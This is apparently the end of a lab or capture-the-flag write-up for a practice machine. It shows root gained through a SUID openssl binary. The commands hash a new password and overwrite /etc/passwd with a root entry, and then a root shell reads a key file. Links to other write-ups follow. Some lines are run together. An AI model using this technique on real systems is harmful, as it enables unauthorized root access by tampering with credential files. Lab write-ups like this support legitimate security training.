-rws--x--x. 1 root root 24K Feb 2 2021 /usr/bin/chfn ---> SuSE_9.3/10
-rws--x--x. 1 root root 24K Feb 2 2021 /usr/bin/chsh
-rwsr-xr-x. 1 root root 73K Aug 8 2019 /usr/bin/chage
-rwsr-xr-x. 1 root root 77K Aug 8 2019 /usr/bin/gpasswd
-rwsr-xr-x. 1 root root 41K Aug 8 2019 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x. 1 root root 543K Mar 28 2022 /usr/bin/openssl
openssl SUID
sh
openssl passwd "newroot"
$1$m8AahRvC$m3n.a6KkxWcg94p2NHuzT0sh
root:$1$m8AahRvC$m3n.a6KkxWcg94p2NHuzT0:0:0:root:/root:/bin/bashsh
LFILE=/etc/passwd
echo 'root:$1$m8AahRvC$m3n.a6KkxWcg94p2NHuzT0:0:0:root:/root:/bin/bash' | openssl enc -out "$LFILE"sh
[root@localhost tmp]# whoami
whoami
root
[root@localhost tmp]# cat /root/key.txt
cat /root/key.txt
3rbjc019bhdsv6784bjk
[root@localhost tmp]# date
date
Sun Feb 9 12:44:07 EST 2025
Up next
EasyFeb 2025
VHL — Forum
uftpd FTP server with anonymous access. Forum application vulnerability exploited to obtain a shell and escalate to root.
Read writeup
EasyFeb 2025
VHL — Quick
Quick.CMS v6.7 with a known authenticated RCE vulnerability. Admin credentials discovered via enumeration for initial access.
Read writeup
EasyFeb 2025
VHL — Tiki
TikiWiki CMS Groupware on CentOS. Exploited a known CVE for unauthenticated remote code execution to gain a shell.
Read writeup